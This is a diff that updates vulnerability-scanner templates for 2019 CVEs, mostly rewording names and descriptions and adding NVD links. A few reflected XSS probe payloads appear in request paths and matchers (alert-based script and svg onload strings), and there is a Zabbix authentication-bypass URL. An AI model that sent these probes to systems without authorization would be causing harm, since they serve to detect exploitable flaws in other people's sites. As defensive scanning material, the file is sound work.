     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16525.yaml

@@ -1,15 +1,15 @@
 id: CVE-2019-16525
 
 info:
-  name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
     - https://wordpress.org/plugins/checklist/#developers
     - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
     - https://plugins.trac.wordpress.org/changeset/2155029/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-16931.yaml

@@ -1,16 +1,16 @@
 id: CVE-2019-16931
 
 info:
-  name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
+  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
   author: ritikchaddha
   severity: medium
   description: |
-    By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
+    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
   reference:
     - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
     - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
     - https://wpvulndb.com/vulnerabilities/9893
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-17382.yaml

@@ -7,7 +7,7 @@ info:
   description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
   reference:
     - https://www.exploit-db.com/exploits/47467
-    - https://www.cvedetails.com/cve/CVE-2019-17382/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1

cves/2019/CVE-2019-18665.yaml

@@ -9,7 +9,6 @@ info:
   reference:
     - https://atomic111.github.io/article/secudos-domos-directory_traversal
     - https://vuldb.com/?id.144804
-    - https://www.cvedetails.com/cve/CVE-2019-18665
     - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
     - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
   classification:

cves/2019/CVE-2019-19134.yaml

@@ -1,15 +1,16 @@
 id: CVE-2019-19134
 
 info:
-  name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
   reference:
     - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
     - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
     - https://heroplugins.com/product/maps/
     - https://heroplugins.com/changelogs/hmaps/changelog.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-19368.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-19368
 
 info:
-  name: Rumpus FTP Web File Manager 8.2.9.1 XSS
+  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
+  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
   reference:
     - https://github.com/harshit-shukla/CVE-2019-19368/
     - https://www.maxum.com/Rumpus/Download.html
     - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "value=''><sVg/OnLoAD=alert`1337`//'>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-19908.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-19908
 
 info:
-  name: phpMyChat-Plus - Cross-Site Scripting
+  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
+  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
   reference:
     - https://cinzinga.github.io/CVE-2019-19908/
     - http://ciprianmp.com/
     - https://sourceforge.net/projects/phpmychat/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -29,3 +30,5 @@ requests:
         words:
           - "<script>alert(1337)</script>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-20141.yaml

@@ -1,14 +1,15 @@
 id: CVE-2019-20141
 
 info:
-  name: Neon Dashboard - Cross-Site Scripting
+  name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
   author: knassar702
   severity: medium
-  description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
+  description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
   reference:
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
     - https://knassar702.github.io/cve/neon/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20141
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -33,3 +34,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-20183.yaml

@@ -15,7 +15,7 @@ info:
     cvss-score: 7.2
     cve-id: CVE-2019-20183
     cwe-id: CWE-434
-  tags: upload,edb,cve,cve2019,rce,intrusive
+  tags: edb,cve,cve2019,rce,intrusive,fileupload
 
 requests:
   - raw:

cves/2019/CVE-2019-20210.yaml

@@ -1,16 +1,16 @@
 id: CVE-2019-20210
 
 info:
-  name: CTHthemes CityBook < 2.3.4 - Reflected XSS
+  name: WordPress CTHthemes - Cross-Site Scripting
   author: edoardottt
   severity: medium
   description: |
-    The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
+    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
   reference:
     - https://wpscan.com/vulnerability/10013
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
     - https://wpvulndb.com/vulnerabilities/10018
     - https://cxsecurity.com/issue/WLB-2019120112
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-3402.yaml

@@ -1,13 +1,14 @@
 id: CVE-2019-3402
 
 info:
-  name: Jira - Reflected XSS using searchOwnerUserName parameter.
+  name: Jira <8.1.1 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
+  description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
   reference:
     - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
     - https://jira.atlassian.com/browse/JRASERVER-69243
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +32,5 @@ requests:
         words:
           - "<script>alert(1)</script>"
         part: body
+
+# Enhanced by mp on 2022/08/31

cves/2019/CVE-2019-3911.yaml

@@ -1,14 +1,13 @@
 id: CVE-2019-3911
 
 info:
-  name: LabKey Server < 18.3.0 - XSS
+  name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
   author: princechaddha
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
+  description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
-    parameter in the /__r2/query endpoints.
   reference:
     - https://www.tenable.com/security/research/tra-2019-03
-    - https://www.cvedetails.com/cve/CVE-2019-3911
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3911
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07

cves/2019/CVE-2019-7219.yaml

@@ -1,14 +1,16 @@
 id: CVE-2019-7219
 
 info:
-  name: Zarafa WebApp Reflected XSS
+  name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
   author: pdteam
   severity: medium
   description: |
-    Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
+    Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
     - https://stash.kopano.io/repos?visibility=public
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7219
+  remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -20,7 +22,6 @@ requests:
   - method: GET
     path:
       - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
-
     matchers-condition: and
     matchers:
       - type: word
@@ -31,7 +32,8 @@ requests:
         part: header
         words:
           - "text/html"
-
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07